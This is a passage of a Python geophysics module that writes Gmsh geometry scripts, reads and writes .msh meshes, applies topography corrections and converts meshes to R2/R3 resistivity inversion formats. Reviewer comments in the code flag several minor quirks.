    foreground_pt_fmt = "Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }}\n"
    out_fore_mult = mesh_utils.find_line_orientation(gmsh_obj)
    with open(out_fname,'w') as f:
        f.write("// Gmsh project created using Python on {}\n".format(time.strftime("%Y-%m-%d %H:%M:%S",time.localtime())))
        # Write point data by survey row
        for i in gmsh_obj.points['order']:
            f.write("// Points for row {}\n".format(i+1))
            for ipt,lineptkey in enumerate(gmsh_obj.points[i]['order']):
                x,y,z,clen = gmsh_obj.points[i][lineptkey]
                f.write("Point({0}) = {{{1}, {2}, {3}, {4}}};\n".format(lineptkey,x,y,z,clen)) # reverse x,y to match R3 example
                all_pts.append(lineptkey)
            f.write("\n") # blank space
        if mesh_dim == 2:
            # Write Translate command for external foreground boundaries
            f.write(foreground_pt_fmt.format(boundary_dict['fdxdy'][0],0.,0,np.max(gmsh_obj.endpt)))
            f.write(foreground_pt_fmt.format(boundary_dict['fdxdy'][0],-boundary_dict['fdxdy'][1],0,np.max(gmsh_obj.endpt)))
            f.write(foreground_pt_fmt.format(-boundary_dict['fdxdy'][0],-boundary_dict['fdxdy'][1],0,np.min(gmsh_obj.startpt)))
            f.write(foreground_pt_fmt.format(-boundary_dict['fdxdy'][0],0.,0,np.min(gmsh_obj.startpt)))
            f.write("\n") # blank space
            # For far background
            f.write("p1[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(boundary_dict['bdxdy'][0]+boundary_dict['fdxdy'][0],0.,0,np.max(gmsh_obj.endpt)))
            f.write("p3[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(boundary_dict['bdxdy'][0]+boundary_dict['fdxdy'][0],-boundary_dict['bdxdy'][1],0,np.min(gmsh_obj.endpt)))
            f.write("p4[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(-boundary_dict['bdxdy'][0]-boundary_dict['fdxdy'][0],-boundary_dict['bdxdy'][1],0,np.max(gmsh_obj.startpt)))
            f.write("p2[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(-boundary_dict['bdxdy'][0]-boundary_dict['fdxdy'][0],0.,0,np.min(gmsh_obj.startpt)))
            f.write("\n") # blank space
        else:
            # Write Translate command for external boundaries, foreground first
            f.write(foreground_pt_fmt.format(out_fore_mult[2][0]*boundary_dict['fdxdy'][0],out_fore_mult[2][1]*boundary_dict['fdxdy'][1],0,np.max(gmsh_obj.startpt)))
            f.write(foreground_pt_fmt.format(out_fore_mult[0][0]*boundary_dict['fdxdy'][0],out_fore_mult[0][1]*boundary_dict['fdxdy'][1],0,np.min(gmsh_obj.startpt)))
            f.write(foreground_pt_fmt.format(out_fore_mult[1][0]*boundary_dict['fdxdy'][0],out_fore_mult[1][1]*boundary_dict['fdxdy'][1],0,np.min(gmsh_obj.endpt)))
            f.write(foreground_pt_fmt.format(out_fore_mult[3][0]*boundary_dict['fdxdy'][0],out_fore_mult[3][1]*boundary_dict['fdxdy'][1],0,np.max(gmsh_obj.endpt)))
            f.write("\n") # blank space
            # For far background
            f.write("p1[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(boundary_dict['bdxdy'][0],-boundary_dict['bdxdy'][1],0,np.max(gmsh_obj.startpt)))
            f.write("p2[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(-boundary_dict['bdxdy'][0],-boundary_dict['bdxdy'][1],0,np.min(gmsh_obj.startpt)))
            f.write("p3[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(-boundary_dict['bdxdy'][0],boundary_dict['bdxdy'][1],0,np.min(gmsh_obj.endpt)))
            f.write("p4[]=Translate {{{0},{1},{2}}} {{ Duplicata {{ Point{{{3}}}; }} }};\n".format(boundary_dict['bdxdy'][0],boundary_dict['bdxdy'][1],0,np.max(gmsh_obj.endpt)))
            f.write("\n") # blank space
        # Set characteristic length for background elements
        # NOTE(review): clen here is the loop variable leaked from the last
        # point written above, not a parameter of this function.
        if isinstance(clen,str):
            f.write("Characteristic Length {{p1[0], p2[0], p3[0], p4[0]}} = {} * {};\n".format(boundary_dict['bclen'],clen)) # assumes clen used above in this function
        else:
            f.write("Characteristic Length {{p1[0], p2[0], p3[0], p4[0]}} = {};\n".format(boundary_dict['bclen']*clen))
        f.write("\n") # blank space
        if hasattr(gmsh_obj,'region_dict'):
            if gmsh_obj.region_dict is not None:
                # Write region geometry
                f.write("// Region points \n")
                for i in gmsh_obj.region_dict['order']:
                    # Write region points
                    f.write("// Points for region {}\n".format(i+1))
                    for ipt,lineptkey in enumerate(gmsh_obj.region_dict[i]['region_points']['order']):
                        x,y,z,clen = gmsh_obj.region_dict[i]['region_points'][lineptkey]
                        f.write("Point({0}) = {{{1}, {2}, {3}, {4}}};\n".format(lineptkey,x,y,z,clen)) # must reverse x,y to match R3 example
                        all_pts.append(lineptkey)
                f.write("\n")
        # Write foreground boundary lines
        if mesh_dim == 2:
            # Foreground connects into electrode lines
            foreground_lines = gmsh_obj.boundaries['foreground']['order']
            f.write("// Foreground boundary lines\n")
            for i in foreground_lines:
                if i not in all_lines:
                    f.write("Line({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.boundaries['foreground'][i]])))
                    all_lines.append(i)
        else:
            # Write Line data by row
            for iline in gmsh_obj.surveyline_startend['order']:
                f.write("// Line {} of electrodes\n".format(iline+1))
                line_nums = np.arange(gmsh_obj.surveyline_startend[iline][0],gmsh_obj.surveyline_startend[iline][1]+1)
                for line_num in line_nums:
                    if line_num not in all_lines:
                        f.write("Line({0}) = {{{1}}};\n".format(line_num,', '.join([str(itemp) for itemp in gmsh_obj.lines[line_num]])))
                        all_lines.append(line_num)
                f.write("\n") # blank space
            # Joining lines between electrode lines
            join_lines = np.sort(gmsh_obj.connecting_segs.ravel())
            f.write("// Lines connecting lines of electrodes\n")
            for join_line in join_lines:
                if join_line not in all_lines:
                    f.write("Line({0}) = {{{1}}};\n".format(join_line,', '.join([str(itemp) for itemp in gmsh_obj.lines[join_line]])))
                    all_lines.append(join_line)
            f.write("\n") # blank space
            f.write("// Foreground boundary lines\n")
            for i in gmsh_obj.boundaries['foreground']['order']:
                if i not in all_lines:
                    f.write("Line({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.boundaries['foreground'][i]])))
                    all_lines.append(i)
        f.write("\n") # blank space
        # Write background boundary lines
        f.write("// Background boundary lines\n")
        for i in gmsh_obj.boundaries['background']['order']:
            if i not in all_lines:
                f.write("Line({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.boundaries['background'][i]])))
                all_lines.append(i)
        f.write("\n") # blank space
        nregion_surfs = 0
        surf_keys_ordered = gmsh_obj.surfaces['order']
        if hasattr(gmsh_obj,'region_dict'):
            if gmsh_obj.region_dict is not None:
                # Write region geometry
                f.write("// Region data \n")
                region_phys_surfline_list = []
                region_back_phys_surfline_list = []
                region_fore_phys_surfline_list = []
                region_phys_surf_list = []
                for i in gmsh_obj.region_dict['order']:
                    # Write region lines
                    f.write("// Lines for region {}\n".format(i))
                    line_nums = gmsh_obj.region_dict[i]['region_lines']['order']
                    for line_num in line_nums:
                        if line_num not in all_lines:
                            f.write("Line({0}) = {{{1}}};\n".format(line_num,', '.join([str(itemp) for itemp in gmsh_obj.region_dict[i]['region_lines'][line_num]])))
                            all_lines.append(line_num)
                    f.write("\n") # blank space
                    # Write region surface
                    for surfline_key in gmsh_obj.region_dict[i]['region_surflines']['order']:
                        f.write("Line Loop({0}) = {{{1}}};\n".format(surfline_key,', '.join([str(itemp) for itemp in gmsh_obj.region_dict[i]['region_surflines'][surfline_key]])))
                        if gmsh_obj.region_dict[i]['active_domain'] in ['foreground']:
                            region_fore_phys_surfline_list.append(surfline_key)
                        else:
                            region_back_phys_surfline_list.append(surfline_key)
                    for surf_key in gmsh_obj.region_dict[i]['region_surfaces']['order']:
                        f.write("Plane Surface({0}) = {{{1}}};\n".format(surf_key,', '.join([str(itemp) for itemp in gmsh_obj.region_dict[i]['region_surfaces'][surf_key]])))
                        region_phys_surf_list.append(surf_key)
                    f.write("\n") # blank space
                # Assign the physical surface for the region
                # Assumes only foreground and background assigned earlier
                if len(region_back_phys_surfline_list)>0:
                    gmsh_obj.surfaces[surf_keys_ordered[1]].append(region_back_phys_surfline_list[0]) # add to end of background surface
                if len(region_fore_phys_surfline_list)>0:
                    gmsh_obj.surfaces[surf_keys_ordered[0]].append(region_fore_phys_surfline_list[0]) # add to end of foreground surface
                for ireg,reg_surf in enumerate(region_phys_surf_list):
                    nregion_surfs +=1
                    f.write("Physical Surface({0}) = {{{1}}};\n".format(nregion_surfs,reg_surf))
        # Write the lines needed to make surfaces
        f.write("// Foreground and Background surface lines and surfaces\n")
        all_surf_keys = np.sort(np.hstack([gmsh_obj.surflines['order'],gmsh_obj.surfaces['order']]))
        for i in all_surf_keys:
            if i in gmsh_obj.surflines['order']:
                f.write("Line Loop({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.surflines[i]])))
            elif i in gmsh_obj.surfaces['order']:
                f.write("Plane Surface({0}) = {{{1}}};\n".format(i,', '.join([str(itemp) for itemp in gmsh_obj.surfaces[i]])))
            f.write("\n") # blank space
        f.write("\n") # blank space
        if mesh_dim == 2:
            f.write("\n")
            # Physical surfaces numbered after any region surfaces above.
            for icount,isurf in enumerate(gmsh_obj.surfaces['order']):
                f.write("Physical Surface({0}) = {{{1}}};\n".format(icount+nregion_surfs+1,isurf))
        else:
            # Extrude foreground surfaces
            f.write("// Extrude foreground surfaces\n")
            prep_nlayers = ', '.join([str(round(itemp,ndigits)) for itemp in extrude_dict['nlayer_list']])
            prep_zratios = ', '.join([str(round(itemp,ndigits)) for itemp in extrude_dict['domain_zratios']])
            fg_list = []
            for icount,isurf in enumerate(gmsh_obj.surfaces['order'][:-1]): # all but the background surface
                f.write("fg{0}[] = Extrude {{0,0,{1}}} {{Surface{{{2}}}; Layers{{ {{{3}}}, {{{4}}} }}; Recombine; }};\n".format(\
                        icount,-extrude_dict['max_depth'],
                        isurf,
                        prep_nlayers,
                        prep_zratios))
                fg_list.append("fg{0}[1]".format(icount))
            f.write("\n") # blank space
            # Extrude background surface
            f.write("// Extrude background surface\n")
            # NOTE(review): the leading icount argument fills {0}, which this
            # format string never references; leftover from the loop above.
            f.write("bg[] = Extrude {{0,0,{1}}} {{Surface{{{2}}}; Layers{{ {{{3}}}, {{{4}}} }}; Recombine; }};\n".format(\
                    icount,-extrude_dict['max_depth'],
                    gmsh_obj.surfaces['order'][-1],
                    prep_nlayers,prep_zratios))
            f.write("\n") # blank space
            # Write Physical volumes
            f.write("Physical Volume(1) = {{{0}}};\n".format(", ".join(fg_list)))
            f.write("Physical Volume(2) = {{{0}}};\n".format('bg[1]'))
def add_topo(msh_fname=None,mesh_dict=None,out_file=None,topo_file=None,
             surf_elev=0.,
             nxy = 100, method='linear', fill_value=0.,
             write_gmsh_bool=False, gmsh_out_fname=None,
             r2_bool=True,topo_load_dict={'cols2read':[0,1,2],
                                          'nheaders':1}):
    '''Add topography to gmsh .msh file.
    Adds topography to a gmsh .msh file. Reads the nodes in 'msh_fname' (the gmsh
    3D msh file) and for each elevation 'plane' it perturbs the node
    elevation according to the values given in z. z holds the topography
    values corresponding to x and y and is interpolated across the gmsh mesh.
    NOTE: The upper surface of the original gmsh .msh must be flat and set to surf_elev.
    Inputs:
    msh_fname: str
        gmsh 3D .msh file with flat upper surface with an elevation of surf_elev.
    topo_file: str
        text file containing x,y,z coordinates in three columns.
    method: str
        choice of interpolation for 2D interpolation. Currently does not include
        options available in addTopo.m (gridfit.m).
    r2_bool: boolean
        defines whether R2 is being used. If False, assumes 3D mesh for R3.
    Output:
    out_file: str
        the file in which new node elevations and co-ordinates are written
        in ASCII format. These data should replace the 'nodes' section
        of the original gmsh .msh file.
    Returns (mesh_dict, topo_data) on success; implicitly returns None when
    topo_file is missing or does not exist.
    NOTE(review): topo_load_dict is a mutable default argument; safe only
    while callers do not mutate it.
    Source: After Matlab addTopo.m function by James Ramm 2012 in R3 package.'''
    from scipy.interpolate import griddata
    # Read topography file
    if topo_file is not None and os.path.isfile(topo_file):
        topo_data,header_info = load_delim(topo_file,**topo_load_dict)
        # Read in mesh
        if mesh_dict is None: # Load .msh, otherwise use input mesh_dict
            mesh_dict = read_gmsh(msh_fname=msh_fname)
        # Expand nxy (currently only consumed by the commented-out gridding below)
        if isinstance(nxy,(float,int)):
            nx,ny = nxy,nxy
        else:
            nx,ny = nxy
        if r2_bool:
            # -------- Add topography to 2D mesh -------------
            node_xyz = mesh_dict['nodes']
            # Use the last available column of the topo file as elevation.
            if topo_data.shape[-1]<3:
                ydata = topo_data[:,1]
            else:
                ydata = topo_data[:,2]
            # Use z in topofile to adjust node y values
            # NOTE(review): surf_elev is added to the interpolated values --
            # confirm intended offset convention.
            new_y_diff = surf_elev+pyres_utils.extrap(node_xyz[:,0],topo_data[:,0],
                                                      ydata,method=method)
            node_xyz[:,1] = node_xyz[:,1]+new_y_diff
            mesh_dict['nodes'] = node_xyz
        else:
            # -------- Add topography to 3D mesh -------------
            # Find surface coordinates
            surface_xyz = mesh_dict['nodes'][mesh_dict['nodes'][:,2]==surf_elev,:] # y,x,z
            # Create regularly interpolated grid over full domain
            # xdomain = np.linspace(surface_xyz[:,0].min(),surface_xyz[:,0].max(),nx)
            # ydomain = np.linspace(surface_xyz[:,1].min(),surface_xyz[:,1].max(),ny)
            # X,Y = np.meshgrid(xdomain,ydomain)
            # Interpolate topographic data to surface nodes, need to flip x,y in
            # surface_xyz to match R3 example (surface_xyz[:,:2][:,::-1])
            new_surface_z = griddata(topo_data[:,:2],topo_data[:,2],
                                     surface_xyz[:,:2],
                                     method=method,fill_value=fill_value)
            # Group nodes into layers by their unique z values (sorted ascending).
            surface_unique_z,layer_inds = np.unique(mesh_dict['nodes'][:,2],return_inverse=True)
            # Calculate node-based amount to vertically shift nodes in each layer
            surface_zdiff = new_surface_z - surface_xyz[:,2]
            # Adjust nodes in all layers by a constant amount
            # Note: do not need to loop through individual nodes if all layers are
            # ordered the same (i.e., built from extruding a single plane)
            output_node_array = mesh_dict['nodes'].copy()
            for ilayer, layerz in enumerate(surface_unique_z):
                if ilayer != 0: # Do not change the elevation of nodes in the lowest layer
                    active_layer = layer_inds == ilayer
                    output_node_array[active_layer,2] = output_node_array[active_layer,2] + surface_zdiff
            mesh_dict['nodes'] = output_node_array
        if write_gmsh_bool:
            if gmsh_out_fname is None:
                gmsh_out_fname = msh_fname
            write_gmsh(msh_fname=gmsh_out_fname, mesh_dict=mesh_dict)
        return mesh_dict,topo_data
    else:
        print("topo_file not specified or does not exist: {}\n".format(topo_file))
def read_gmsh(msh_fname=None):
    '''Parse a gmsh .msh file into a dictionary of mesh components.

    Returns a dict with keys: npere (nodes per element code), mesh_type,
    nodes, elements (node lists plus trailing zone tag), elem_info,
    zones, and the verbatim mesh_format line.
    '''
    # Section switches toggled by the $...$End... markers.
    in_format, in_nodes, in_elements = 0, 0, 0
    with open(msh_fname,'r') as fobj:
        for raw_line in fobj:
            if raw_line[0] == '$':
                # Section markers. "$End..." also matches the plain section
                # name, so the End tests below must run after the openers.
                if raw_line.find('Nodes') > 0:
                    in_nodes = 1
                if raw_line.find('EndNodes') > 0:
                    in_nodes = 0
                if raw_line.find('Elements') > 0:
                    in_elements = 1
                if raw_line.find('EndElements') > 0:
                    in_elements = 0
                if raw_line.find('MeshFormat') > 0:
                    in_format = 1
                if raw_line.find('EndMeshFormat') > 0:
                    in_format = 0
            elif in_nodes == 1:
                pieces = raw_line.split()
                if len(pieces) <= 2:
                    # Node-count line: start a fresh node list.
                    nodes = []
                else:
                    # Drop the node number, keep coordinates as floats.
                    nodes.append([float(tok) for tok in pieces[1:]])
            elif in_elements == 1:
                pieces = raw_line.split()
                if len(pieces) <= 2:
                    # Element-count line: start fresh element containers.
                    prisms, tets, zones = [], [], []
                    triags = []
                    elem_info = []
                else:
                    entry = [int(tok) for tok in pieces[1:]]
                    elem_info.append(entry[:4])
                    etype, zone_tag = entry[0], entry[2]
                    # Physical-region tag (first tag) becomes the zone number.
                    if etype == 6:      # 6-node triangular prism
                        prisms.append(entry[-6:] + [zone_tag])
                        zones.append(zone_tag)
                    elif etype == 4:    # 4-node tetrahedron
                        tets.append(entry[-4:] + [zone_tag])
                        zones.append(zone_tag)
                    elif etype == 2:    # 3-node triangle
                        triags.append(entry[-3:] + [zone_tag])
                        zones.append(zone_tag)
            elif in_format == 1:
                # Keep the format line verbatim for re-writing the .msh.
                mesh_format = raw_line
    # Decide the dominant element type.
    if len(prisms) > len(tets):
        npere, mesh_type, elements = 6, 'Triangular prisms', prisms
    elif len(tets) > len(triags):
        npere, mesh_type, elements = 4, 'Tetrahedra', tets
    else:
        # NOTE(review): npere is 2 here although triangles have 3 nodes;
        # preserved from the original implementation.
        npere, mesh_type, elements = 2, 'Triangular', triags
    return {'npere': npere, 'mesh_type': mesh_type, 'nodes': np.array(nodes),
            'elements': np.array(elements), 'elem_info': np.array(elem_info),
            'zones': zones, 'mesh_format': mesh_format}
def write_gmsh(msh_fname=None,mesh_dict=None):
    '''Write the mesh components in mesh_dict back out as a gmsh .msh file.

    Inverse of read_gmsh: nodes/elements are re-numbered from 1; the
    trailing zone column of each element row is dropped on output.
    '''
    node_rows = mesh_dict['nodes'].tolist()
    elem_strs = mesh_dict['elements'].astype(str)
    info_strs = mesh_dict['elem_info'].astype(str)
    with open(msh_fname,'w') as fobj:
        # --- Mesh format section (stored verbatim by read_gmsh) ---
        fobj.write('$MeshFormat\n')
        fobj.write("{}".format(mesh_dict['mesh_format']))
        fobj.write('$EndMeshFormat\n')
        # --- Node section: 1-based node number then x, y, z ---
        fobj.write('$Nodes\n')
        fobj.write('{0:d}\n'.format(mesh_dict['nodes'].shape[0]))
        for inode, node_row in enumerate(node_rows):
            fobj.write('{0:d} {1:f} {2:f} {3:f}\n'.format(inode+1,node_row[0],node_row[1],node_row[2]))
        fobj.write('$EndNodes\n')
        # --- Element section: number, info tags, node list (zone dropped) ---
        fobj.write('$Elements\n')
        fobj.write('{0:d}\n'.format(mesh_dict['elements'].shape[0]))
        for ielem, (erow, irow) in enumerate(zip(elem_strs, info_strs)):
            fobj.write('{0} {1} {2}\n'.format(ielem+1," ".join(irow)," ".join(erow[:-1])))
        fobj.write('$EndElements\n')
def gmsh_to_R3(msh_fname=None,out_file='mesh3d.dat', topo_correct=False,
               topo_dict=None, overwrite=True, verbose=False,alpha_scale=1,
               job_type=1):
    '''Convert .msh to R3 mesh3d.dat.

    Returns (message, number of zones, mesh_dict, topo_data).
    NOTE(review): mesh_dict['elements'] is mutated in place below (converted
    to a list and a unique parameter number inserted before the zone
    column), so the returned mesh_dict differs from what read_gmsh loaded.
    Source: After Gmsh2R3t.py by Florian Wagner 2012 from R3t package'''
    if topo_correct:
        # Shift node elevations using a topography file before export.
        mesh_dict,topo_data = add_topo(msh_fname=msh_fname,**topo_dict)
    else:
        mesh_dict = read_gmsh(msh_fname=msh_fname)
        topo_data = None
    # Write new mesh3d.dat file
    if os.path.dirname(out_file) in ['']:
        # Save to same dirictory as .msh file
        output_file = os.path.join(os.path.dirname(msh_fname),out_file)
    else:
        output_file = out_file # Directory already specified in output
    exist_flag=0
    if os.path.isfile(output_file):
        print("Warning: {} is already created. Default is to overwrite.".format(output_file))
        exist_flag = 1
    # Zone numbers come from the trailing column of each element row.
    unq_zones = np.unique(mesh_dict['elements'][:,-1])
    if exist_flag == 0 or overwrite:
        with open(output_file,'w') as wfid:
            # Define mesh components. Create one dirichlet node, datum = 0
            wfid.write('%d %d 1 0 %d \n' % (len(mesh_dict['elements']), len(mesh_dict['nodes']), mesh_dict['npere']))
            if isinstance(mesh_dict['elements'],np.ndarray):
                mesh_dict['elements'] = mesh_dict['elements'].tolist()
            for i, elem in enumerate(mesh_dict['elements']):
                wfid.write('%d ' % (i + 1))
                elem.insert(-1, i+1) # unique parameter number
                for entry in elem:
                    wfid.write('%d ' % entry)
                wfid.write('\n')
            wfid.write('\n')
            for i, node in enumerate(mesh_dict['nodes']):
                node_entry = list(node)
                node_entry.insert(0, i+1)
                wfid.write('%d %10.3f %10.3f %10.3f \n' % tuple(node_entry) )
            wfid.write('1\n') # dirichlet node
            # Define smoothing scale for each mesh zone
            if job_type == 1 or job_type in ['inv','inverse','Inv','Inverse']:
                if len(unq_zones)> 1:
                    if isinstance(alpha_scale,(int,float)):
                        # Broadcast a scalar smoothing scale to all zones.
                        alpha_scale = alpha_scale*np.ones_like(unq_zones)
                    for izone,alpha_scale_temp in enumerate(alpha_scale):
                        wfid.write('{0:d} {1:f}\n'.format(izone+1,alpha_scale_temp))
    # Show mesh information
    # NOTE(review): the message reports success even when the file already
    # existed and overwrite=False (nothing was written in that case).
    message = """
    %s has been successfully created.
    Mesh Info:
    Type of elements: %s
    Nodes: %d
    Elements: %d
    Zones: %d
    """ % (os.path.basename(output_file), mesh_dict['mesh_type'],
           len(mesh_dict['elements']), len(mesh_dict['nodes']),
           len(set(mesh_dict['zones'])))
    if verbose:
        print(message)
    return message,len(unq_zones),mesh_dict,topo_data
def gmsh_to_R2(msh_fname=None,out_file='mesh.dat', topo_correct=False,
               topo_dict=None, overwrite=True, verbose=False,alpha_scale=1,
               node_zones=None,param_zones=None,default_zone=1):
    '''Convert .msh to R2 mesh.dat.

    Parameters
    ----------
    msh_fname : str
        Path of the Gmsh .msh file to convert.
    out_file : str
        Output file name; written next to ``msh_fname`` when it carries
        no directory component.
    topo_correct : bool
        Apply topography correction via ``add_topo`` using ``topo_dict``.
    topo_dict : dict or None
        Keyword arguments for ``add_topo`` (required when ``topo_correct``).
    overwrite : bool
        Overwrite an existing output file.
    verbose : bool
        Print the summary message.
    alpha_scale : int or float
        Unused here; kept for call compatibility with the R3t converter.
    node_zones : dict or None
        Element index -> zone number; rebuilt from the mesh unless the mesh
        has a single zone and None was passed.
    param_zones : dict or None
        Optional per-zone flags of the form {zone: {'param': bool, 'zone': bool}}.
    default_zone : int
        Zone number written when no explicit zone applies.

    Returns
    -------
    (message, number_of_zones, mesh_dict, topo_data)

    Source: After Gmsh2R3t.py by Florian Wagner 2012 from R3t package'''
    if topo_correct:
        mesh_dict,topo_data = add_topo(msh_fname=msh_fname,**topo_dict)
    else:
        mesh_dict = read_gmsh(msh_fname=msh_fname)
        topo_data = []
    # Map every element index to a zone number.
    if node_zones is None and len(np.unique(mesh_dict['zones']))==1:
        node_zones = {}
        for icount,elem_num in enumerate(mesh_dict['elements']):
            node_zones.update({icount:1})
    else:
        node_zones = {}
        for icount,(elem_num,elem_zone) in enumerate(zip(mesh_dict['elements'],mesh_dict['zones'])):
            node_zones.update({icount:elem_zone})
    # Write new mesh.dat file
    if os.path.dirname(out_file) in ['']:
        # Save to same directory as .msh file
        output_file = os.path.join(os.path.dirname(msh_fname),out_file)
    else:
        output_file = out_file # Directory already specified in output
    exist_flag=0
    if os.path.isfile(output_file):
        print("Warning: {} is already created. Default is to overwrite.".format(output_file))
        exist_flag = 1
    all_zones = []
    if exist_flag == 0 or overwrite:
        with open(output_file,'w') as wfid:
            # Header: element count then node count.
            wfid.write('%d %d \n' % (len(mesh_dict['elements']), len(mesh_dict['nodes'])))
            wfid.write('\n')
            if isinstance(mesh_dict['elements'],np.ndarray):
                mesh_dict['elements'] = mesh_dict['elements'].tolist()
            icount=1
            for i, elem in enumerate(mesh_dict['elements']):
                wfid.write('{0:10.0f}'.format(i + 1))
                if param_zones is not None:
                    if node_zones[i] in param_zones.keys():
                        if param_zones[node_zones[i]]['param']: # if it is true
                            icount-=1 # keep icount the same if still in the zone
                elem.insert(-1,icount) # unique parameter number
                icount+=1
                for entry in elem[:-1]:
                    wfid.write('{0:10.0f}'.format(entry))
                temp_node_zone = default_zone
                # Bug fix: guard against param_zones=None; previously this
                # check raised AttributeError whenever param_zones was None.
                if param_zones is not None and node_zones[i] in param_zones.keys():
                    if param_zones[node_zones[i]]['zone']: # if it is true
                        temp_node_zone = node_zones[i]+1 # increase from default if 1
                wfid.write('{0:10.0f}'.format(temp_node_zone))
                all_zones.append(temp_node_zone)
                wfid.write('\n')
            wfid.write('\n')
            wfid.write('\n')
            for i, node in enumerate(mesh_dict['nodes']):
                node_entry = list(node)
                node_entry.insert(0, i+1)
                wfid.write('{0:d} {1:10.3f} {2:10.3f} \n'.format(*node_entry[:-1]))
    unq_zones = np.unique(all_zones)
    # Show mesh information.
    # Bug fix: node and element counts were swapped in the summary message.
    message = """
    %s has been successfully created.
    Mesh Info:
    Type of elements: %s
    Nodes: %d
    Elements: %d
    Zones: %d
    """ % (os.path.basename(output_file), mesh_dict['mesh_type'],
           len(mesh_dict['nodes']), len(mesh_dict['elements']),
           len(set(mesh_dict['zones'])))
    if verbose:
        print(message)
    return message,len(unq_zones),mesh_dict,topo_data
def gridfit(xyz=None,xynodes=None, smoothness=1, interp='triangle',
            regularize_type='gradient', solver='vector', max_iter=None,
            extend='warning', tilesize=np.inf, overlap=0.2, mask=None,
            autoscale=True, xyscale=[1,1]):
    '''Conform surface to regular grid.
    Source: After Matlab gridfit.m function by James Ramm 2012 in R3 package.

    Currently a stub: it only unpacks the coordinate triplet, warns the
    caller, and echoes the coordinates back.
    '''
    # Unpack the x, y, z coordinates from either a 3-item list or an
    # (n, 3) array.
    if isinstance(xyz, list):
        x, y, z = xyz
    elif isinstance(xyz, np.ndarray):
        x = xyz[:, 0]
        y = xyz[:, 1]
        z = xyz[:, 2]
    print("Error: gridfit function in development and incomplete.")
    return x, y, z
def find_boundary_pts(boundary_dict=None,exclude_array=None):
    '''Find mesh points not in exclude_array.

    Returns an array of the unique non-excluded points (in first-seen
    order) and the list of edge keys whose points are all non-excluded.
    '''
    kept_points = []
    clean_edge_keys = []
    for edge_key in boundary_dict.keys():
        edge_is_clean = True
        for point in boundary_dict[edge_key]:
            if point in exclude_array:
                # Any excluded point disqualifies the whole edge.
                edge_is_clean = False
            elif point not in kept_points:
                kept_points.append(point)
        if edge_is_clean:
            clean_edge_keys.append(edge_key)
    return np.array(kept_points), clean_edge_keys
def load_delim(fname,nheaders=2,delimiter=' ',
               col_scales = [1,1,1,1],cols2read=[0,1],
               drop_na=True):
    '''Load a delimited text file.

    The first ``nheaders`` lines are collected verbatim; remaining
    non-blank lines are split on ``delimiter`` and the columns listed in
    ``cols2read`` are parsed as floats.  Each parsed column is multiplied
    by the matching non-zero entry of ``col_scales`` and, when ``drop_na``
    is True, rows containing NaN are removed.

    Returns (data_array, header_info).
    '''
    header_lines = []
    parsed_rows = []
    with open(fname, 'r') as fobj:
        for line_num, raw_line in enumerate(fobj):
            if line_num < nheaders:
                header_lines.append(raw_line)
            elif raw_line not in ['\n']:
                pieces = np.array(raw_line.split(delimiter))[cols2read]
                parsed_rows.append([float(piece.strip().strip(' \t'))
                                    for piece in pieces])
    out_array = np.array(parsed_rows)
    # Apply per-column scale factors; a zero scale leaves the column as-is.
    for col_index, scale in enumerate(col_scales):
        if col_index < out_array.shape[-1] and float(scale) != 0.0:
            out_array[:, col_index] = out_array[:, col_index] * float(scale)
    if drop_na:
        # Any NaN in a row makes that row's sum NaN, dropping the row.
        out_array = out_array[~np.isnan(out_array.sum(axis=1))]
    return out_array, header_lines
def insert_key_halfway(orig_dict=None,in_keys=None,
                       new_pts=None,new_keys=None):
    '''Insert key into unordered dictionary.

    Each edge ``in_key`` (an entry like [p0, p1]) is split at ``new_pt``
    into [p0, new_pt] kept under ``in_key`` and [new_pt, p1] stored under
    ``new_key``; the new key is placed directly after ``in_key`` in the
    key ordering.
    '''
    out_dict = orig_dict.copy()
    # Use the explicit ordering when present, otherwise sort the keys.
    # NOTE: when 'order' exists this intentionally aliases the caller's
    # list (shallow copy), matching the historical in-place behavior.
    if 'order' in out_dict.keys():
        dict_keys = out_dict['order']
    else:
        dict_keys = np.sort(list(out_dict.keys())).tolist()
    for split_key, split_pt, added_key in zip(in_keys, new_pts, new_keys):
        start_pt = orig_dict[split_key][0]
        end_pt = orig_dict[split_key][1]
        out_dict[split_key] = [start_pt, split_pt]
        out_dict[added_key] = [split_pt, end_pt]
        dict_keys.insert(dict_keys.index(split_key) + 1, added_key)
    out_dict.update({'order': dict_keys})
    return out_dict
def renumber_dict(in_dict=None,start_num=None):
    '''Renumber unordered dictionary.

    Keys are replaced by consecutive integers starting at ``start_num``,
    following the 'order' entry when present and sorted key order
    otherwise.  Returns the renumbered dict (with its own 'order' list)
    and the next unused key number.
    '''
    if 'order' in in_dict.keys():
        key_sequence = in_dict['order']
    else:
        key_sequence = np.sort(list(in_dict.keys()))
    renumbered = {}
    new_order = []
    next_key = start_num
    for old_key in key_sequence:
        renumbered[next_key] = in_dict[old_key]
        new_order.append(next_key)
        next_key += 1
    renumbered['order'] = new_order
    return renumbered, next_key
def check_dict_entries(main_dict=None,other_dict=None):
    '''Check if dictionary entry exists in main dictionary.

    For every entry of ``other_dict`` that geometrically matches an entry
    of ``main_dict`` (as decided by ``pyres_utils.match_xy``), the entry is
    re-keyed to the matching main-dict key; unmatched entries keep their
    original keys.  The resulting key sequence is stored under 'order'.

    Returns (new_dict, replaced_keys) where replaced_keys lists
    [old_key, main_key] pairs for every re-keyed entry.

    NOTE(review): matching semantics depend entirely on the external
    pyres_utils.match_xy helper — confirm its tolerance/ordering before
    changing this function.
    '''
    # Respect an explicit 'order' when present, otherwise sort the keys.
    if 'order' in main_dict.keys():
        main_keys = main_dict['order']
